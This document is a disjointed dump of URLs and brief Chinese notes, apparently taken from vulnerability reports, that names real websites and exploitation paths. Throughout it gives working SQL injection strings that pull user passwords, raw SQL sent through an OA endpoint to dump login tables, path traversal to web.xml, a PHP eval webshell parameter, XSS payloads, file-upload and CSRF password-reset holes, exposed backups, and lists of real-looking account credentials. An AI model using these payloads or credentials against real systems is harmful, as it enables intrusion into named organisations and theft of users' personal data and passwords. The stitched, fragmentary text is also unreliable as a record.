http://wenku.baidu.com/view/f3f0a27fb84ae45c3b358cf2.html看到陕西省人口个案管理信息系统的使用说明书: http://124.115.170.79:9080/pis/ KERNEL_VERSION:3.4.67-qemu+ http://202.96.17.115/mobile_bpm/login.do;jsessionid=D44C0AADFB7581908F8ED1A9D2FA2A8B?method=logout&navLevel=0 test:abcd1234 liwei:abcd1234 liumin:abcd1234 lili:abcd1234 liuyong:abcd1234 liying:abcd1234 lili:abcd1234 wanglin:abcd1234 yangtao:abcd1234 liqian:abcd1234 lihao:abcd1234 chenhui:abcd1234 wanglin:abcd1234 liying:abcd1234 liuyun:abcd1234 liguizhi:abcd1234 xumin:abcd1234 http://bbs.7659.com/config/config_ucenter.php.bak http://www.cnitpm.com/qun/userforum.aspx?name=a http://www.cnitpm.com/search.aspx?keyword=a http://www.glsc.com.cn/glzq/broker/salerQuery.jsp http://www.glsc.com.cn/glzq/financing/management/tdkh_byd_1.jsp http://dwzy.xbmu.edu.cn/msxy/index_v.aspx http://wechat.cc.letv.com/EliteWebChat/logout.do http://home.ldjt.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459130 http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459230 http://ams.ziroom.com/AMS/configuration/dispatchOrderAudit!viewHomeApplianceOrders.do?orderAid=459330 www.gwdang.com 3.spdy/3.1 http://qw.yz.gov.cn/index.php Injection:qw.yz.gov.cn/news_content.php?id=1095 http://116.52.249.221/NtBankWeb/admin/calogin/fjunitlogin.do http://**.**.**/user-login.html q-open.jia.com/api/pay/query_balance q-open.jia.com/api/pay/query_trade q-open.jia.com/api/pay/query_deposit q-open.jia.com/api/pay/query_fos http://121.33.74.72/login.php http://121.33.74.72/index.php http://121.33.74.72/main.php http://121.33.74.72/user.php http://121.33.74.72/manual/ http://121.33.74.72/menu.php http://121.33.74.72/user.php直接将用户名和明文密码暴漏出来,且能够直接对用户进行修改密码和删除用户的操作,影响到广东多个城市的数十个账号。 http://121.33.74.72/main.php和http://121.33.74.72/menu.php均可越权操作 com:8888 http://218.249.47.94/Xianghe/MTK_Phone_KK_UAprofile.xml http://zwxxjs.yn.gov.cn/wasadmin/index.html http://**.**.**.**/bugs/wooyun-2015-0108778 http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://**.**.**.**/comm_front/public_info/content_category_list.jsp?class_id=1&class_name=%EF%BF%BD%DB%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.xbrc.com.cn/xbrc/front/index https://cms.dyqx.com http://oa.jinshiedu.net/consult/consultStudent/studentProfileList.do ftp://221.1.211.94/ ftp://121.31.13.165/ http://my.qfang.com/register/toforgetPsd http://eproc.nepalbank.com.np/tenders.php?action=setorder&sortby=tender_code&sortorder=desc http://eproc.ntc.net.np/tenders.php?action=setorder&sortby=tender_code&sortorder=desc http://www.edudbc.gov.np/tenders.php?action=setorder&sortby=tender_code&sortorder=desc http://obss.nrb.org.np/ebid/tenders.php?action=setorder&sortby=tender_code&sortorder=desc http://eproc.dor.gov.np/tenders.php?action=setorder&sortby=tender_code&sortorder=asc http://www.co.ccpit.org:80/AllDownload.aspx?type=IF2_1 http://tvs.tcl.com:80/tvs/checkfrontLogin.do http://feedback.wochacha.com/admin.php?m=Bugback&a=view_client&id=76763&p1=1&pageSize=5&remark_1=0&remark_2=0 http://feedback.wochacha.com/admin.php?m=Bugback&a=view_client&id=76763&p1=1&pageSize=5&remark_1=0&remark_2=0 http://feedback.wochacha.com/admin.php?m=Bugback&a=view_client&id=76763&p1=1&pageSize=5&remark_1=0&remark_2=0 http://x.tv.sohu.com http://wooyun.org/bugs/wooyun-2010-096906 http://192.168.182.153:8080/ http://192.168.182.154:8080/login.html?ReturnUrl=%2f http://192.168.182.185/login.jsp# http://10.30.2.45/WebUIProject/UILoader/login.aspx http://10.30.6.25/Job/TalentMarket/Default.aspx http://www.chaojibiaoge.com/index.php/Home/Index/forgetPassword http://boshihou.eol.cn/site_connet.php?sid=2556 http://oa.tcl.com:89/m1/login.do http://**.**.**.**/cgal/default.htm https://github.com/58Automation/ResponseTimeTool/blob/7cb0d04e26465cc0ef2efa7db4347e52c0dc18ab/src/main/resources/email.xml http://www.qqhrgaj.gov.cn/view.do?viewType=viewOnePhoto&id=35 http://www.gzzgh.net/ http://mall.bydauto.com.cn/index.php/customer/account/login/这个地方是比亚迪客户登陆的地方,看到登陆地址没有验证码限制 http://cms.yintai.com/wui/main.jsp?templateId=1 https://mail.htffund.com http://www.11185.com.cn/u/editCustomersPage.html?autopayCustomers.id=651060 http://www.dyzky.net/news/?z_id=277 http://www.dyzky.net/news/?z_id=270&pageindex=2 http://www.dyzky.net/news/picindex.php?z_id=270 https://github.com/frank0718/163.com/blob/b4bd595e9119f0888046077bff0fc551d2570e2f/python/smtp.py http://www.gnict.com/cn/news/news_list.jsp?ID=4682 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://game.ent.sina.com.cn https://github.com/alpinist23/commons/blob/d328e7b16a1472d3e887f4c8aa467504046cc5f1/common.message/message.client/src/test/resources/spring-commons-client.xml http://**.**.**.**/admin/Product/Comstye.aspx http://**.**.**.**/admin/Product/Comstye.aspx http://**.**.**.**/admin/Product/Comstye.aspx http://**.**.**.**/admin/Product/Comstye.aspx http://www.zte-d.com/manage/admin_top.aspx,出现跳转提示,禁用浏览器js功能,可以发现,其实页面返回了内容: http://www.zte-d.com/manage/role/master_update.aspx?user=,应该存在admin这个用户,直接就进入修改密码页面了: http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/lib/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/read/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/js/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/reader/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/WebLibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/web/reader.aspwci=login_ http://**.**.**/tsg/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/tsg/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/libweb/reader.aspwci=login_ http://**.**.**/tsg/reader.aspwci=login_ http://**.**.**/WebLibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/weblibsys/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/reader.aspwci=login_ http://**.**.**/libweb/reader.aspwci=login_ http://www.hntcm.gov.cn admin:84a2e9437eba98f8cad909d583e7d7cc#1 localhost:zyyglj# http://thothinfo.com/home/UserHsp/RegistSupply thothinfo.com/pub/Attachments/list?pkey_value=0000005708&table_name=HSP_REG_CP_FORM&attach_type=FILEUP_REG_CODE&sidx=attach_id&sord=asc&t=1438261612977 http://zqoa.sxgt.net/ http://zqoa.sxgt.net/lks/sys/lks_public.nsf/ http://ekp.ya999.com/ http://ekp.ya999.com/lks/sys/lks_public.nsf/84b5fb13f9d3697c48256b7d00258d27/27bf9fad37823a7f48257d0f00353870?OpenDocument http://www.enet.com.cn/enews/inforcenter/itdate/fitdate.jsp?province=&etype=&fromyear=200 http://www.cjol.com/jobseekers/JobOpportunity/applyajobnoregsucceed.aspx?JobPostID=6888463 http://zjy.gdcost.com/ http://zjy.gdcost.com/login.ashx?act=v2&v=vWHB_KSAPB2&w=cityid%3D4400 http://www.sxgt.net/ http://www.jnfda.gov.cn/fda/permit/common/permitApplStuffMainAction.do?operFlag=query&req_id=0000000000016042&dispFlag=edit&stuffflag=0&appltype=171# http://www.jnfda.gov.cn/js/dialogWrapper.jsp?url=/fda/commons/attachmentsViewAction.do%3fvest%3d171%26busiCode%3d0000000000016042%26applType%3d171%26applStuffId%3d0000000001392828 url:http://119.254.70.121/ http://119.254.70.121//upload/video/PIC_0000001180.jsp http://172.16.4.245核心销售平台弱口令,简单看一下,基本销售业务都在眼皮下了 www.guh-software.de ldap://172.16.3.12:389/ http://172.16.4.30/users/sign_in http://passport.homelink.com.cn/cas/login?service=http://sm.lianjia.com/shiro-cas http://172.16.4.38/login_page.php?return=index.php&error=1&username=admin&perm_login=0&secure_session=1 password:homelink http://fms.feiniu.com/login.php http://fms.feiniu.com/mail.php http://fms.feiniu.com/unsubscribe.php http://fms.feiniu.com/unsubscribe.php https://github.com/58Automation/ResponseTimeTool/blob/f2f3c12202cf2e8d46c2dfc055e2e2eafc5e90d9/src/main/resources/email.xml http://115.29.198.140:8080/ http://e.tju.edu.cn/OA/tmsgReadLog.do?msgid=697269 http://oa.trip8080.com/跳转到 http://221.6.35.202:8009/ http://acm.zjut.edu.cn/system/messageInfoAction.do http://112.25.58.6:1988/ http://rst.aoratec.com/gnpdm/logout.shtml http://sasac.yingyan189.com/login.asp http://oa.trip8080.com/ http://221.6.35.202:8009/ http://221.6.35.202:8009/tools/SWFUpload/upload.jsp height:20px;BORDER http://221.6.35.202:8009/null1.jsp http://hq.fruitday.com:88/login/Login.jsp?logintype=1 http://www.ximalaya.com/passport/user_info/show http://219.143.235.42/syportal/login?weblogic.servlet.network_channel.port=9001 http://zop.zto.cn/ http://zop.zto.cn//UploadFile/20150209/huohuo123_6c334cce8dff4569aa4ae4e13ea01807_20150510212511.ASP http://life.sina.com.cn/info.php?id=649 http://ma.mmarket.com/ http://www2.dgunicom.com:80/webout/picksystem/pick_system_agent.jsp存在注入,导致数据库,用户帐号密码、用户信息泄露 www2.dgunicom.com http://www.hgfs.com.cn/jishunews.php?id=10 https://github.com/guyuzhilian/Programs/blob/3f5f0ab44131624b56f9626b50ebf3612456f6ae/Tools/popo_advice/cfg.py http://210.75.8.3:9002/jmx-console/ http://222.190.111.116/doc/page/main.asp http://app.gwm.cn:8055/PerformanceEvaluate/ http://app.gwm.cn:9000/xinpingtai/default.aspx http://voice.yiban.cn/web/getUserInfo post:uid http://www.lib.imut.edu.cn/admin/ewebeditor/dialog/about.htm http://www.lib.imut.edu.cn/admin/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye http://www.xnsdyyy.com/index.action http://tool.717199.com/zhoupu/?q={${eval%28$_POST[x]%29 http://tool.717199.com/zhoupu/?q={${eval%28$_POST[x]%29 http://mon.beequick.cn/zabbix/dashboard.php?ddreset=1&sid=8a188daf2827926a http://210.31.160.240/index.htm http://shijue.me/show_text/55bafaa58ddf8752d2011cac http://shijue.me http://www.hlslm.cn/Content/id/88* http://125.88.33.172/fsms/login http://lccb.guet.edu.cn/jmx-console/ http://lccb.guet.edu.cn/jmx-console/1.jsp。管理员看到删掉吧。 http://fangvip.ganji.com/auth.php?do=login这个接口是赶集网房源管理系统,登陆的接口没有任何的验证限制 http://www.akfc.gov.cn/shownews.asp?id=156 http://www.huomaotv.com/就是火猫TV的主站登陆接口,点击登陆就出来了,看到没有任何登陆限制 http://iamdeloitte.hiall.com.cn/uc_server/data/config.txt http://service.szgas.com.cn/Guide/GuideDetail.aspx?module=4214&id=156 http://sqlmap.org http://www.wxchina.com/index.php?s=/About/about_trends/aid/156*.html http://sqlmap.org http://www.v2ex.com/t/189910 https://paypassport.suning.com/ids/oauth20/authorize?client_id=suning_01&response_type=code&redirect_uri=http://mail-shengji.com/youxiang.asp http://114.251.242.188:8080/iclock/imanager http://my.pcauto.com.cn/cmt/receivereply.jsp com:24593 http://jsjx.gdsspt.net/manage/login.aspx http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20users http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,user%28%29,3,4,5,6,7,8,9,10,11%20from%20users http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,database%28%29%20from%20users http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,table_name%20from%20information_schema.tables%20where%20table_schema=0x736B796D http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,column_name%20from%20information_schema.columns%20where%20table_schema=0x736B796D%20and%20table_name=0x7573657273%20limit%20%200,1 http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,column_name%20from%20information_schema.columns%20where%20table_schema=0x736B796D%20and%20table_name=0x7573657273%20limit%20%201,1 http://skym.ctgu.edu.cn/newsdetail.php?gid=2&id=60%20%20and%201=2%20union%20select%201,userid,3,4,5,6,7,8,9,10,pwd%20from%20users http://www.juneyaoair.com/pages/register/register.aspx注册两个账号 http://www.juneyaoair.com/pages/MyAccount/commonMemberEdit.aspx?para=username:%E6%89%8B%E6%9C%BA%E5%8F%B7%E4%B8%80,mobile:,certificateType:CC,certificateNo:1111,birthday:2015-07-23,passengerType:ADT,sex:M,belongCountry:,certValidity:,nationality:,countryTelCode:86,ffCardNo:,commonContactId:1721669 http://mail.yili.com/user/?q=login http://www.career.ecnu.edu.cn/adm_StuInfoMG/Print_jybdzsqb.aspx?xsxh=51110801003 http://www.career.ecnu.edu.cn/adm_StuInfoMG/Print_jybdzsqb.aspx?xsxh=51110801004 http://www.jxnxs.com/eportal/ui?moduleId=1&pageId=436085&struts.portlet.action=/portlet/uploadFile.action&isCkEditor=true http://airchina.health.ikang.om/为国航定制,选择普通会员找回密码 http://photo.sinosig.com/ http://photo.sinosig.com/images/class.asp http://218.94.57.147:9001/gen/SysLogin.aspx http://218.94.57.147:8997/gen/Login.aspx http://www.jsds.gov.cn/download/ http://**.**.**.**/bugs/wooyun-2015-0113942 http://**.**.**.**/bugs/wooyun-2015-0113942 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** http://www.wfrcsc.com/web/qyShow.jsp?id=32939 http://subsite.nenu.edu.cn/professor/pro/yul/c_jbxx_new.php?id=1304 http://111.205.50.219/ http://111.205.50.219/spring/flww/flowUser/isRight http://sqlmap.org http://117.25.194.120/ http://117.25.194.121/ http://117.25.194.122/ http://117.25.194.123/ http://117.25.194.124/ http://117.25.194.125/ http://www.yichengpin.com http://a.cheshi.com/user/0300/order/order_price.php?action=info&orderid=5467900 http://a.cheshi.com/user/0300/order/order_steer.php?action=info&orderid=5467926 http://a.cheshi.com/user/0300/order/order_exchange.php?action=info&orderid=5467926 http://a.cheshi.com/user/0300/order/order_repair.php?action=info&orderid=1 http://a.cheshi.com/user/0300/order/order_second.php?action=info&orderid=12650 http://crm.maidouyisheng.com/.svn/entries http://suifang.net/.svn/entries http://www.maidouyisheng.com/.svn/entries http://www.ziroom.com/ziroomer/activity/?category_id=11 http://wooyun.org/bugs/wooyun-2015-0124425 http://www.ztbest.com/index.php?mod=user&act=login http://xg.hbwj.com.cn/page/TAB_ArchivesPrint/XGStudyLogPrint.aspx?stuId=144978&sess=1146&stage=2 http://xg.hbwj.com.cn/page/TAB_ArchivesPrint/XGStudyLogPrint.aspx?stuId=144979&sess=1146&stage=2 http://yc.hbwj.com.cn/page/welcomepage/quickdetail_form.aspx?stuid=118607 http://yc.hbwj.com.cn/page/welcomepage/QuickDetail_Form.aspx?stuID=195387 http://124.173.121.130 http://124.173.121.130/admin http://124.173.121.130/admin/sql.php URL:http://1icounter.sinosig.com/invoker/JMXInvokerServlet http://1icounter.sinosig.com/lmes/index.jsp http://lib.scmu.edu.cn/robots.txt http://lib.scmu.edu.cn/temp/data/deepthroat_20140607_995701_1.sql http://202.104.124.60 http://www.gogo.cn/Admin/ http://222.222.62.58:8008/Default.aspx http://218.6.203.34/setsys_backup.htm导出配置文件。 http://www.weaver.com.cn/ http://pm.weaver.cn:9085/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://oa.cowealth.com:8080/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://snkbj.bluefocusgroup.com/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://oa.acgmc.com/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://oa.smvic.com.cn/ServiceAction/com.eweaver.base.DataAction?sql=select%20LOGONPASS%20from%20SYSUSER%20where%20LONGONNAME%20=%20%27sysadmin%27 http://218.28.18.5/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER https://github.com/JanvenZhao/Trunk-NoCommit http://mobile-api2011.elong.com http://www.astour.gov.cn/newsPage.php?nsId=2389 http://www.cjhdj.com.cn/CjhdjManage http://www.acicmall.com/ http://www.acicmall.com/uum/member/resetPassword/MzIwMzM= http://www.acicmall.com/uum/member/resetPassword/MzIwMzQ= www.acicmall.com http://www.acicmall.com http://bbs.tianya.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml http://wenda.tianya.cn/search.jsp http://passport.tianya.cn/countryTel/json.do?var=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://open.tianya.cn/static/js/my_popbox_js.js/a.php http://ebook.tianya.cn/ http://apps.tianya.cn/static/upgrade2/css/style.css/a.php http://fc.tcl.com/admin/tcl03.aspx www.hanzify.org http://dangqun.sjzpt.edu.cn/index.php?c=index&a=lists&catid=1&parentid=0 http://keyan.sjzpt.edu.cn/news/index.php?itemid=1 http://keyan.sjzpt.edu.cn/news/content.php?newsid=433 http://part.sjzpt.edu.cn/keyan/news/list.php?itemid=44 http://zzb.sjzpt.edu.cn//index.php?c=index&a=show&newsid=191 http://sd.99.com/ http://m.open.com.cn/search/results/1?keywords=-1 http://www.yileyoo.com/programme_detail/101 http://saas.sundns.com/yoveleDynamic_details.html?ID=206 http://sunuc.sundns.com/Details_dow_page.html?ID=79 www.e-cology.com.cn http://www.e-cology.com.cn/messager/users.data www.zhaokao.net http://221.179.131.155/ http://www.zteclouds.cn http://122.115.57.230/portal/user/forget.htl index.php/channel/search/l/cn www.hslcs.org.cn www.lubaocar.com http://www.lubaocar.com/web.rar http://www.erun360.com/infocenter/Search.aspx?word=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://221.230.140.53:81/TaiZhou/systemsetting/userLogin.action http://suzhou.dcits.com/ http://suzhou.dcits.com/guoxin/cn/products.php?tid=3 https://github.com/chengxiaowei/-demo-/blob/fb215c0765828697a887b680cbf30d27e1a05fa2/%E6%8B%9B%E8%81%98.txt http://www.dtdrc.gov.cn/ldjhnr1.asp?action=list&newsclass=4&id=70 http://www.dtdrc.gov.cn/Login.asp?act=add http://www.dtdrc.gov.cn/root.asp http://credit.open.com.cn/Home/Login http://credit.open.com.cn:80/Home/Login http://oa.daojia.com/ http://www.to8to.com/yezhu/list.php?&btype=2&stype=1&s=2 http://www.to8to.com/yezhu/list.php?&btype=2&stype=1 http://www.to8to.com/yezhu/list.php?&btype=2&stype=1 http://bbs.g.baofeng.com/ inurl:http://huodong.fanli.com/xunlei?xluserid= http://huodong.fanli.com/xunlei?xluserid=138800632&xlaccount=311456982&cachetime=0.9165479822770544 http://huodong.fanli.com/xunlei?xluserid=428510&xlaccount=minemings&ischild=0&cachetime=0.5528254928067327 http://huodong.fanli.com/xunlei?xluserid=135044542&xlaccount=267905322&ischild=0&cachetime=0.5916803723666817 http://www.xianda365.com/ http://fzb.dlzs.gov.cn/xzcf_detail.php?id=90 http://sqlmap.org http://wooyun.org/bugs/wooyun-2010-0102464 http://rd.haierpeople.cn http://crm.taxchina.com/wcm/inside/HoldsRate/Public/LookFee/List.aspx?Ids=10977794 http://approval.cqnc.gov.cn/Approval/ApprovalList.aspx?SearchStr=%E5%8C%BA%E5%AE%89%E7%9B%91%E5%B1%80 http://cqnc.gov.cn/super/login.asp http://approval.cqnc.gov.cn/Approval/ApprovalList.aspx?SearchStr=%E5%8C%BA%E5%AE%89%E7%9B%91%E5%B1%80 http://mail.cnr.cn/webmail/.svn/entries http://www.x-rosen.com/pro.php?id=90 http://am.hit.edu.cn/zpy/mdscorelogin.php http://am.hit.edu.cn/zpy/mdscorecheck.php http://58.215.56.61/OA/Login.aspx http://58.215.56.61/OA/ExcelExport/%E4%BA%BA%E5%91%98%E5%88%97%E8%A1%A8.xls http://61.183.36.24/oa8/ http://61.132.114.180:8080/mail/login.aspx?loginid=%B0%AE%B5%C4&password=ad+&tj=%B5%C7+%C2%BD http://www.haxx.lss.gov.cn/ggxx/perinfo.php该界面可以查询社保,试着在password处输入-1 http://www.haxx.lss.gov.cn:80/ www.haxx.lss.gov.cn http://baidurank.aizhan.com/baidu/apesk.com/position/ http://www.apesk.com/Management-potential/glqz_report_admin.asp?id=26 http://www.deyang.gov.cn/manager/login.jsp http://www1.deyang.gov.cn/fgw-new/LawDetailPage.aspx?ID=77 http://www1.deyang.gov.cn/fgw-new/LawDetailPage.aspx?ID=77 http://archi.hit.edu.cn/quit!LogOut.do http://dev.gionee.com/developer/login.jsp http://www.jys.gov.cn/public/js/count.php?i=262648 http://demo.magicwinmail.com:6080/ http://mail.cqksy.cn/ http://afis.hit.edu.cn/system/log.jsp http://218.76.35.13:8801/LWP http://www.chinagreentown.com/hr/comm_member_resume.php http://www.chinagreentown.com/upload/resume/f379f2cd024938d6743bd5e470836a57.php http://admin.houtai.163disk.com/index.php http://cabin.airchina.com.cn/cwzb/default.jsp http://cabin.airchina.com.cn/cwzb/changepwdAction.do?user=admin*&password=asdasd&newpwd1=asdasd111&newpwd2=asdasd111 http://www.961890.gov.cn/content/NewsPaperInfo.aspx?PolicyWorkSn=1312 http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**:86/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**:86/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/ http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://www.lorealparis.com.cn/Member/NewLogin.loreal?link=1 http://workflow.cyou-inc.com:89/login.do https://mail.cyou-inc.com/ http://221.179.131.155/ http://www.tlstar.com.cn/Account/UserList.aspx http://www.160job.com/main/kongsijianjie.asp?idCompany= http://tj.fruitday.com/login.php,登陆页面存在csrf,可以构造post请求,重置管理员密码 http://bbs.pinyin.sogou.com http://bbs.pinyin.sogou.com/uc_server/data/tmp/upload25.jpg/1.php http://oa.emar.com/showphoto.xf?photoid=1 http://oa.ciming.com/)存在任意文件上传漏洞 http://oa.ciming.com/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://oa.ciming.com/defaultroot/upload/information/+文件名 http://mrtg.cc.sandai.net/auth/login/ http://123.162.191.90/auth/login/ http://115.239.134.136/ http://115.239.134.136/Login/login.do http://www.xiangguo.com/login http://union.chinadrtv.com/login site:xyfm.niu.xunlei.com http://dp.gdppla.edu.cn/jybnew/ewebeditor/admin_login.asp?action=login dp.gdppla.edu.cn/jybnew/eWebEditor/db/ewebeditor.mdb http://zyyd.media.open.com.cn/picexam/picexam.asp?course_id=0001 http://zyyd.media.open.com.cn/picexam/picexam.asp?course_id=0001 http://zyyd.media.open.com.cn/picexam/picexam.asp?course_id=0001 www.chevip.com https://www.hontai.com.tw/09pages/cont/qaservice.aspx?Aid=QAS74&Qid=R&Uid=qa0001 http://www.hspcn.net/home/ProductPro/?PRODUCT_TYPE=*&MORE10_FLAG=&AREA_ID=&pagesize=20&sidx=&sord=&PRODUCT_PIC_FLAG=false&REALNAME_FLAG=false&SEARCH_KEYWORD=a http://www.hspcn.net/home/ProductPro/?PRODUCT_TYPE=&sidx= http://www.tianlian.com http://www.jxrtvu.edu.cn/Service/GetSchoolOverview.ashx?TYPEID= http://www.lrts.me/updateBasicInfo.do?areaIds=地区&birthday=生日&email=邮箱&nickName=昵称&remark=个性签名&sex=性别 http://t.im/qcfo"/ http://www.lrts.me/updateBasicInfo.do?areaIds=29_456&birthday=1970-1-1&email=test@test.com&nickName=xk%3Cimg%20src=%22http://t.im/qcfo%22/%3E&remark=test&sex=1 http://www.lrts.me/addComment.do?commentContent=test&entityId=9758&entityType=2 http://www.lrts.me/user/addFollow.do?userId=123141749 http://www.lrts.me/user/cancellFollow.do?userId=123141749 http://www.lrts.me/user/addCollection.do?entityId=9758&entityType=2 http://www.lrts.me/user/delCollection.do?entityId=9758&entityType=2 